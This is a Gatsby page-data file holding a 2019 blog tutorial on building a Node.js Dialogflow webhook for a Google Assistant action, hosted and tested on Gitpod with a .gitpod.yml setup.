{"componentChunkName":"component---src-narative-gatsby-theme-novela-templates-article-template-tsx","path":"/build-a-webhook-for-google-assistant-action","result":{"data":{"allSite":{"edges":[{"node":{"siteMetadata":{"name":"Anudeep Reddy","siteUrl":"https://anudeepsblog.netlify.com"}}}]}},"pageContext":{"isCreatedByStatefulCreatePages":false,"article":{"id":"7e2c739d-9166-5f41-be73-e40d74678404","slug":"/build-a-webhook-for-google-assistant-action","secret":false,"title":"Build a Webhook for Google Assistant Action","author":"Anudeep Reddy","date":"December 8th, 2019","dateForSEO":"2019-12-08T00:00:00.000Z","timeToRead":4,"excerpt":"First of all I would like to start this section by saying, I ❤ Gitpod","subscription":true,"body":"function _extends() { _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsx mdx */\nvar _frontmatter = {\n \"title\": \"Build a Webhook for Google Assistant Action\",\n \"author\": \"Anudeep Reddy\",\n \"date\": \"2019-12-08T00:00:00.000Z\",\n \"hero\": \"./images/hero.png\",\n \"excerpt\": \"First of all I would like to start this section by saying, I ❤ Gitpod\"\n};\n\nvar makeShortcode = function makeShortcode(name) {\n return function MDXDefaultShortcode(props) {\n console.warn(\"Component \" + name + \" was not imported, exported, or provided by MDXProvider as global scope\");\n return mdx(\"div\", props);\n };\n};\n\nvar layoutProps = {\n _frontmatter: _frontmatter\n};\nvar MDXLayout = \"wrapper\";\nreturn function MDXContent(_ref) {\n var components = _ref.components,\n props = _objectWithoutProperties(_ref, [\"components\"]);\n\n return mdx(MDXLayout, _extends({}, layoutProps, props, {\n components: components,\n mdxType: \"MDXLayout\"\n }), mdx(\"p\", null, \"This post is all about how to build your webhook for your Google Assistant action and host it temporarily on Gitpod and test your code.\"), mdx(\"h2\", {\n \"id\": \"prerequisites\"\n }, \"Prerequisites\"), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"Node JS\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"Express JS\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"Basics on how to use Github\")), mdx(\"p\", null, \"If you have these in place, Let\\u2019s get started.\"), mdx(\"h2\", {\n \"id\": \"what-is-gitpod\"\n }, \"What is Gitpod?\"), mdx(\"p\", null, \"First of all I would like to start this section by saying, I \\u2764 Gitpod. Gitpod is an online IDE for Github. Gitpod provides you with a fully working development environment, including a VS Code-powered IDE and a cloud-based Linux container configured specifically for the project at hand. Just prefix your Github repo URL with \\u201D\", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://gitpod.io/#%22\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"https://gitpod.io/#\\u201D\"), \", So that the final link looks something like this \\u201D\", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://gitpod.io/#https://github.com/%5Busername%5D/%5Brepo-name%5D\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"https://gitpod.io/#https://github.com/[username]/[repo-name]\"), \"\\u201D or you can also use the Gitpod \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://chrome.google.com/webstore/detail/gitpod-online-ide/dodmmooeoklaejobgleioelladacbeki?hl=en\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"browser extension\"), \" to add the Gitpod button to Github page.\"), mdx(\"iframe\", {\n width: \"560\",\n height: \"315\",\n src: \"https://www.youtube.com/embed/bFZMKpDV3GQ\",\n frameBorder: \"0\",\n allow: \"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\",\n allowFullScreen: true\n }), mdx(\"h2\", {\n \"id\": \"lets-start-building\"\n }, \"Let\\u2019s start building\"), mdx(\"p\", null, \"I have created a Github repo which will help you get started without any hassle. The repo is basically a boilerplate to get started with building your webhook. The code is written in Node JS, So it would be easier for you to build on top of it if you are already familiar with Node JS. We will be using the \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://www.npmjs.com/package/actions-on-google\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"action-on-google\"), \" Node JS library (This client library makes it easy to create Actions for the Google Assistant and supports Dialogflow, Actions SDK, and Smart Home fulfillment.).\"), mdx(\"h3\", {\n \"id\": \"create-your-action\"\n }, \"Create your Action\"), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"Head over to \", mdx(\"a\", _extends({\n parentName: \"li\"\n }, {\n \"href\": \"https://console.actions.google.com/\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"https://console.actions.google.com/\"), \" and click on New Project.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-2.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Annotation-2019-06-28-141627.png\",\n \"alt\": \"Annotation-2019-06-28-141627\"\n }))), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"Enter your project name and click on create project.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-1.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/gitpod-action.png\",\n \"alt\": \"gitpod-action\"\n }))), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"Now select a category for your Action.\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"Now under the Develop menu, give your action a name.\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"Now head over to actions menu in Develop tab and click on \", mdx(\"strong\", {\n parentName: \"li\"\n }, \"Add your first action\"), \".\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-1.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/temp2.png\",\n \"alt\": \"temp2\"\n }))), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"In the next section choose \", mdx(\"strong\", {\n parentName: \"li\"\n }, \"custom intent\"), \" and click on \", mdx(\"strong\", {\n parentName: \"li\"\n }, \"build\"), \". Doing this will redirect you to the \", mdx(\"strong\", {\n parentName: \"li\"\n }, \"Dialogflow console\"), \" and it should look something like this.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-3.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/temp3.png\",\n \"alt\": \"temp3\"\n }))), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"Click on create to \", mdx(\"strong\", {\n parentName: \"li\"\n }, \"create\"), \" your agent on Dialogflow.\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"Once your agent is ready, you will already have two default Intents (Default Fallback Intent and Default Welcome Intent) in place and these two do pretty good at their job.\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"Now it\\u2019s time to create a new intent and enable fulfillments for that intent so that we can serve responses from the webhook that we will be building in the next section.\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"Click on create a new intent, give it a name and training phrase (training phrase will be used to invoke the intent). Now that your intent is almost ready scroll down and under fulfillments \", mdx(\"strong\", {\n parentName: \"li\"\n }, \"enable webhook call\"), \" for the new Default welcome intent and the new intent you just created.\")), mdx(\"h3\", {\n \"id\": \"understanding-gitpodyml\"\n }, \"Understanding .gitpod.yml\"), mdx(\"p\", null, \"The .gitpod.yml file is used to automate setting up the environment required to run your app.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-5.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/carbon--4-.png\",\n \"alt\": \"carbon--4-\"\n }))), mdx(\"p\", null, \"If you want to access services running in your workspace, e.g. a development HTTP server on port 8080, you need to expose that port first. Gitpod has two means of doing that:\"), mdx(\"ol\", null, mdx(\"li\", {\n parentName: \"ol\"\n }, \"On-the-fly: when you start a process which listens on a port in your workspace, Gitpod will ask you if you want to expose that port to the internet.\"), mdx(\"li\", {\n parentName: \"ol\"\n }, \"In your configuration: if you already know that you want a particular port exposed, you can configure it in the .gitpod.yml file and skip the extra click later on. For example:\")), mdx(\"pre\", null, mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {}), \"ports:\\n - port: 3000\\n\")), mdx(\"p\", null, \"When starting or restarting a workspace you typically want to run certain tasks. Most probably that includes the build and maybe also running tests and automatically start the application in e.g. a dev server.\"), mdx(\"p\", null, \"Gitpod allows you to configure start tasks in the .gitpod.yml file.\"), mdx(\"p\", null, \"For instance, the start script for this repository is defined as:\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {}), \"tasks:\\n- init: npm install\\n command: npm start\\n\")), mdx(\"p\", null, \"You can have multiple tasks, which are opened on separated terminals.\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {}), \"tasks:\\n- init: npm install\\n command: npm start\\n- command: echo -e \\\"\\\\n\\\\nwebhook url - $(gp url 3000)/webhook \\\\n\\\\nCopy and paste this url in the Dialogflow console\\\"\\n\")), mdx(\"h4\", {\n \"id\": \"init-command\"\n }, mdx(\"inlineCode\", {\n parentName: \"h4\"\n }, \"init\"), \" command\"), mdx(\"p\", null, \"The init property can be used to specify shell commands that should only be executed after a workspace was freshly cloned and needs to be initialized somehow. Such tasks are usually builds or downloading dependencies. Anything you only want to do once but not when you restart a workspace or start a snapshot.\"), mdx(\"p\", null, \"In our case the \", mdx(\"inlineCode\", {\n parentName: \"p\"\n }, \"init\"), \" command is\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {}), \"tasks:\\n- init: npm install\\n\")), mdx(\"h3\", {\n \"id\": \"get-the-gitpod-setup-running\"\n }, \"Get the Gitpod setup running\"), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"Fork my \", mdx(\"a\", _extends({\n parentName: \"li\"\n }, {\n \"href\": \"https://github.com/anudeepreddy/dialogflow-webhook-boilerplate-nodejs\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"repo (dialogflow-webhook-boilerplate-nodejs)\"), \" \", mdx(\"strong\", {\n parentName: \"li\"\n }, \"or\"), \" just click on the run in gitpod button in my repo. (If you do this you have to fork it from the workspace so that you can commit your own changes to your repo).\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"Now you can just prefix your repo url with \\u201D\", mdx(\"a\", _extends({\n parentName: \"li\"\n }, {\n \"href\": \"https://gitpod.io/#%22\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"https://gitpod.io/#\\u201D\"), \". This should take you to Gitpod and start your workspace. The workspace take a little while to start.\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"Once the workspace is running you should see something like this.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-2.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Annotation-2019-06-25-171555.png\",\n \"alt\": \"Annotation-2019-06-25-171555\"\n }))), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"If you notice the Node app is already running in the first terminal. This is automated by a Gitpod configuration file. And the webhook URL is printed on to the second terminal. All the dependencies that are required are also installed while creating the workspace.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-5.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Annotation-2019-06-25-171555-crop.png\",\n \"alt\": \"Annotation-2019-06-25-171555-crop\"\n }))), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"Now that the webhook is running and i presume that you already have your agent on Dialogflow (If not create an agent), Next thing you need to do is to copy the webhook URL from the terminal and paste it in the Fulfillments section in the Dialogflow Console.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-5.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Annotation-2019-06-25-172359.png\",\n \"alt\": \"Annotation-2019-06-25-172359\"\n }))), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"Open the index.js file which contains the code for the webhook.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-1.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/carbon--1-.png\",\n \"alt\": \"carbon--1-\"\n }))), mdx(\"p\", null, \"The file initially contains this code. Now lets add some more code to it to display a card when we invoke the new intent we created in the previous section.\\nactions-on-google library provides many functionalities to can simplify your task to render rich responses in your action.\"), mdx(\"p\", null, \"We will be adding the following code to display a card when the new intent is invoked.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-1.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/carbon--3-.png\",\n \"alt\": \"carbon--3-\"\n }))), mdx(\"p\", null, \"Replace the URL\\u2019s and other contents in the code and stop the previous instance of the app from running and start it again after you have made changes to the code by running \", mdx(\"inlineCode\", {\n parentName: \"p\"\n }, \"npm start\"), \" in the terminal.\"), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"To test your action you can click on \", mdx(\"strong\", {\n parentName: \"li\"\n }, \"See how it works in Google Assistant\"), \" in the Dialogflow console.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-3.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Annotation-2019-06-28-175558.png\",\n \"alt\": \"Annotation-2019-06-28-175558\"\n }))), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"Invoking the intent would give you response similar to this.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-5.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Screenshot_20190628-181019.png\",\n \"alt\": \"Screenshot_20190628-181019\"\n }))), mdx(\"p\", null, \"Refer to the links below to add your own functionalities.\"), mdx(\"h2\", {\n \"id\": \"links-to-refer\"\n }, \"Links to Refer\"), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"If you would like to learn more about the actions-on-google library, you can find it here - \", mdx(\"a\", _extends({\n parentName: \"li\"\n }, {\n \"href\": \"https://www.npmjs.com/package/actions-on-google\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"https://www.npmjs.com/package/actions-on-google\")), mdx(\"li\", {\n parentName: \"ul\"\n }, \"Go through these examples - \", mdx(\"a\", _extends({\n parentName: \"li\"\n }, {\n \"href\": \"https://developers.google.com/actions/samples/github\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"https://developers.google.com/actions/samples/github\")), mdx(\"li\", {\n parentName: \"ul\"\n }, \"Rich responses example - \", mdx(\"a\", _extends({\n parentName: \"li\"\n }, {\n \"href\": \"https://github.com/actions-on-google/dialogflow-conversation-components-nodejs\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"https://github.com/actions-on-google/dialogflow-conversation-components-nodejs\"))), mdx(\"h2\", {\n \"id\": \"conclusion\"\n }, \"Conclusion\"), mdx(\"p\", null, \"Gitpod can make your life much simpler by automating your development setup just by adding a simple configuration file to your repo. You can refer to the Gitpod \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://www.gitpod.io/docs/\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"Docs\"), \" to learn more about the platform. Gitpod lets you work with unlimited workspace but with 100hrs/month runtime. It also provides Personal and unlimited plans as well. If you are a student then you can claim Gitpod Unlimited plan for just $9.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://res-3.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/character.gif\",\n \"alt\": \"character\"\n }))), mdx(\"h1\", {\n \"id\": \"happy-coding-with-gitpod-\"\n }, \"Happy coding with Gitpod \\u2728\"));\n}\n;\nMDXContent.isMDXComponent = true;","hero":{"full":{"base64":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAAsSAAALEgHS3X78AAABWklEQVQoz31SzU7CQBDmVfQZfA2fwPfxqpcmXnwBo+nBi5cmkAai4dBCgFabgpQKgQICrf2hO7tOd9tS0TjZfpmZ9tuZ+aY1xhillBCCjmEYsixjaFlWo9Ho9/uappmmqev6ZDIRXwIAovBrwhPkVqslSRI6juMoitJut5GM2Gw2VVV1XZdxo9zQycnVW8tMmUcEbsfk7EURINCDT6v3/pnMK0cEQkLLOlScnyYo2SlnRhzt9tLAv9Q2+jLmHaYs8WjRZFEHH4j2dLZhBIgYIWtbfl2c3HbP7kc3nfnw3f006+n1qWdrhmU747Ft29Pp1POW9tvA/IivHryd+Qy8SEauj9fnd52Lp6HibH3fT7aLtPuYJlEYRhgGQRDHcRiG69UqJSwJ5rBQs16A5DP3vK+XWbCHfOD/jRbS1CqLETJxnXDsXzrzRYokHMjZHwZAClWFGOXOq+ERfgPd8nKcG+ncDQAAAABJRU5ErkJggg==","aspectRatio":1.7777777777777777,"src":"/static/497338b280462c13b7a6e96a9f6b3c89/f4f8c/hero.png","srcSet":"/static/497338b280462c13b7a6e96a9f6b3c89/206f6/hero.png 236w,\n/static/497338b280462c13b7a6e96a9f6b3c89/84032/hero.png 472w,\n/static/497338b280462c13b7a6e96a9f6b3c89/f4f8c/hero.png 944w,\n/static/497338b280462c13b7a6e96a9f6b3c89/513fc/hero.png 1416w,\n/static/497338b280462c13b7a6e96a9f6b3c89/6eada/hero.png 1888w,\n/static/497338b280462c13b7a6e96a9f6b3c89/ba228/hero.png 1920w","srcWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/99fbb/hero.webp","srcSetWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/77392/hero.webp 236w,\n/static/497338b280462c13b7a6e96a9f6b3c89/1f177/hero.webp 472w,\n/static/497338b280462c13b7a6e96a9f6b3c89/99fbb/hero.webp 944w,\n/static/497338b280462c13b7a6e96a9f6b3c89/4a492/hero.webp 1416w,\n/static/497338b280462c13b7a6e96a9f6b3c89/b0b8f/hero.webp 1888w,\n/static/497338b280462c13b7a6e96a9f6b3c89/30cf3/hero.webp 1920w","sizes":"(max-width: 944px) 100vw, 944px"},"regular":{"base64":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAAsSAAALEgHS3X78AAABWklEQVQoz31SzU7CQBDmVfQZfA2fwPfxqpcmXnwBo+nBi5cmkAai4dBCgFabgpQKgQICrf2hO7tOd9tS0TjZfpmZ9tuZ+aY1xhillBCCjmEYsixjaFlWo9Ho9/uappmmqev6ZDIRXwIAovBrwhPkVqslSRI6juMoitJut5GM2Gw2VVV1XZdxo9zQycnVW8tMmUcEbsfk7EURINCDT6v3/pnMK0cEQkLLOlScnyYo2SlnRhzt9tLAv9Q2+jLmHaYs8WjRZFEHH4j2dLZhBIgYIWtbfl2c3HbP7kc3nfnw3f006+n1qWdrhmU747Ft29Pp1POW9tvA/IivHryd+Qy8SEauj9fnd52Lp6HibH3fT7aLtPuYJlEYRhgGQRDHcRiG69UqJSwJ5rBQs16A5DP3vK+XWbCHfOD/jRbS1CqLETJxnXDsXzrzRYokHMjZHwZAClWFGOXOq+ERfgPd8nKcG+ncDQAAAABJRU5ErkJggg==","aspectRatio":1.7777777777777777,"src":"/static/497338b280462c13b7a6e96a9f6b3c89/3e3e7/hero.png","srcSet":"/static/497338b280462c13b7a6e96a9f6b3c89/a123b/hero.png 163w,\n/static/497338b280462c13b7a6e96a9f6b3c89/b6f5d/hero.png 327w,\n/static/497338b280462c13b7a6e96a9f6b3c89/3e3e7/hero.png 653w,\n/static/497338b280462c13b7a6e96a9f6b3c89/de899/hero.png 980w,\n/static/497338b280462c13b7a6e96a9f6b3c89/00f25/hero.png 1306w,\n/static/497338b280462c13b7a6e96a9f6b3c89/ba228/hero.png 1920w","srcWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/0acdf/hero.webp","srcSetWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/ac59e/hero.webp 163w,\n/static/497338b280462c13b7a6e96a9f6b3c89/7660b/hero.webp 327w,\n/static/497338b280462c13b7a6e96a9f6b3c89/0acdf/hero.webp 653w,\n/static/497338b280462c13b7a6e96a9f6b3c89/75470/hero.webp 980w,\n/static/497338b280462c13b7a6e96a9f6b3c89/68d47/hero.webp 1306w,\n/static/497338b280462c13b7a6e96a9f6b3c89/30cf3/hero.webp 1920w","sizes":"(max-width: 653px) 100vw, 653px"},"narrow":{"base64":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAAsSAAALEgHS3X78AAABWklEQVQoz31SzU7CQBDmVfQZfA2fwPfxqpcmXnwBo+nBi5cmkAai4dBCgFabgpQKgQICrf2hO7tOd9tS0TjZfpmZ9tuZ+aY1xhillBCCjmEYsixjaFlWo9Ho9/uappmmqev6ZDIRXwIAovBrwhPkVqslSRI6juMoitJut5GM2Gw2VVV1XZdxo9zQycnVW8tMmUcEbsfk7EURINCDT6v3/pnMK0cEQkLLOlScnyYo2SlnRhzt9tLAv9Q2+jLmHaYs8WjRZFEHH4j2dLZhBIgYIWtbfl2c3HbP7kc3nfnw3f006+n1qWdrhmU747Ft29Pp1POW9tvA/IivHryd+Qy8SEauj9fnd52Lp6HibH3fT7aLtPuYJlEYRhgGQRDHcRiG69UqJSwJ5rBQs16A5DP3vK+XWbCHfOD/jRbS1CqLETJxnXDsXzrzRYokHMjZHwZAClWFGOXOq+ERfgPd8nKcG+ncDQAAAABJRU5ErkJggg==","aspectRatio":1.7777777777777777,"src":"/static/497338b280462c13b7a6e96a9f6b3c89/f156e/hero.png","srcSet":"/static/497338b280462c13b7a6e96a9f6b3c89/f2848/hero.png 114w,\n/static/497338b280462c13b7a6e96a9f6b3c89/42f31/hero.png 229w,\n/static/497338b280462c13b7a6e96a9f6b3c89/f156e/hero.png 457w,\n/static/497338b280462c13b7a6e96a9f6b3c89/cf471/hero.png 686w,\n/static/497338b280462c13b7a6e96a9f6b3c89/3bc69/hero.png 914w,\n/static/497338b280462c13b7a6e96a9f6b3c89/ba228/hero.png 1920w","srcWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/15384/hero.webp","srcSetWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/31fce/hero.webp 114w,\n/static/497338b280462c13b7a6e96a9f6b3c89/e3e25/hero.webp 229w,\n/static/497338b280462c13b7a6e96a9f6b3c89/15384/hero.webp 457w,\n/static/497338b280462c13b7a6e96a9f6b3c89/0258d/hero.webp 686w,\n/static/497338b280462c13b7a6e96a9f6b3c89/64ea2/hero.webp 914w,\n/static/497338b280462c13b7a6e96a9f6b3c89/30cf3/hero.webp 1920w","sizes":"(max-width: 457px) 100vw, 457px"},"seo":{"src":"/static/497338b280462c13b7a6e96a9f6b3c89/7ef28/hero.png"}}},"authors":[{"authorsPage":true,"bio":"I am an undergraduate student. I have been exploring the field of computer science for about 7 years now. I created this blog to\nshare my journey and things I have learnt with everyone out there.\n","id":"187d0db3-c57c-5455-ad24-678a9da5b361","name":"Anudeep Reddy","featured":true,"social":[{"url":"https://github.com/anudeepreddy"},{"url":"https://twitter.com/anudeepc85"},{"url":"https://instagram.com/anudeepc24"},{"url":"https://www.linkedin.com/in/anudeep-reddy-25332262/"}],"slug":"/authors/anudeep-reddy","avatar":{"small":{"base64":"data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAbABQDASIAAhEBAxEB/8QAGQAAAgMBAAAAAAAAAAAAAAAAAAQCAwUB/8QAFwEAAwEAAAAAAAAAAAAAAAAAAQIDAP/aAAwDAQACEAMQAAABmjpopTVOGVBGVV5NlAR//8QAHBAAAgMBAAMAAAAAAAAAAAAAAAECAxEhBDFB/9oACAEBAAEFAvInKKTurOMsWrFpbYb1TkT9/Uf/xAAWEQEBAQAAAAAAAAAAAAAAAAABEBL/2gAIAQMBAT8BCaZ//8QAFxEBAAMAAAAAAAAAAAAAAAAAEAEREv/aAAgBAgEBPwGzMH//xAAdEAABBAIDAAAAAAAAAAAAAAABABARIQISIDFR/9oACAEBAAY/AgMeytppp8QsloDUeH//xAAcEAEBAAICAwAAAAAAAAAAAAABABExQVEQIWH/2gAIAQEAAT8hzj/GcM2GxdlyRglOxZh9rt8LjJDgzglDS0v/2gAMAwEAAgADAAAAEGPvwv/EABcRAQEBAQAAAAAAAAAAAAAAAAEAETH/2gAIAQMBAT8Q1NtgBN7C3//EABkRAAIDAQAAAAAAAAAAAAAAAAABESExUf/aAAgBAgEBPxBwogwrBpcP/8QAGxABAAMBAQEBAAAAAAAAAAAAAQARITFRYUH/2gAIAQEAAT8QHa673kWnQdfSWBXpehNHh9Aey2dwrDeSgAOV+QVICVSaxelz7KW54WI7+zEHcf/Z","aspectRatio":0.73,"src":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/20b9f/anudeep-reddy.jpg","srcSet":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/8de35/anudeep-reddy.jpg 13w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/efbf2/anudeep-reddy.jpg 25w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/20b9f/anudeep-reddy.jpg 50w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/900f1/anudeep-reddy.jpg 75w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/b08b0/anudeep-reddy.jpg 100w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/19128/anudeep-reddy.jpg 438w","srcWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/e7b2c/anudeep-reddy.webp","srcSetWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/58718/anudeep-reddy.webp 13w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/74aad/anudeep-reddy.webp 25w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/e7b2c/anudeep-reddy.webp 50w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/ed320/anudeep-reddy.webp 75w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/66016/anudeep-reddy.webp 100w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/4916f/anudeep-reddy.webp 438w","sizes":"(max-width: 50px) 100vw, 50px"},"medium":{"base64":"data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAbABQDASIAAhEBAxEB/8QAGQAAAgMBAAAAAAAAAAAAAAAAAAQCAwUB/8QAFwEAAwEAAAAAAAAAAAAAAAAAAQIDAP/aAAwDAQACEAMQAAABmjpopTVOGVBGVV5NlAR//8QAHBAAAgMBAAMAAAAAAAAAAAAAAAECAxEhBDFB/9oACAEBAAEFAvInKKTurOMsWrFpbYb1TkT9/Uf/xAAWEQEBAQAAAAAAAAAAAAAAAAABEBL/2gAIAQMBAT8BCaZ//8QAFxEBAAMAAAAAAAAAAAAAAAAAEAEREv/aAAgBAgEBPwGzMH//xAAdEAABBAIDAAAAAAAAAAAAAAABABARIQISIDFR/9oACAEBAAY/AgMeytppp8QsloDUeH//xAAcEAEBAAICAwAAAAAAAAAAAAABABExQVEQIWH/2gAIAQEAAT8hzj/GcM2GxdlyRglOxZh9rt8LjJDgzglDS0v/2gAMAwEAAgADAAAAEGPvwv/EABcRAQEBAQAAAAAAAAAAAAAAAAEAETH/2gAIAQMBAT8Q1NtgBN7C3//EABkRAAIDAQAAAAAAAAAAAAAAAAABESExUf/aAAgBAgEBPxBwogwrBpcP/8QAGxABAAMBAQEBAAAAAAAAAAAAAQARITFRYUH/2gAIAQEAAT8QHa673kWnQdfSWBXpehNHh9Aey2dwrDeSgAOV+QVICVSaxelz7KW54WI7+zEHcf/Z","aspectRatio":0.73,"src":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/b08b0/anudeep-reddy.jpg","srcSet":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/efbf2/anudeep-reddy.jpg 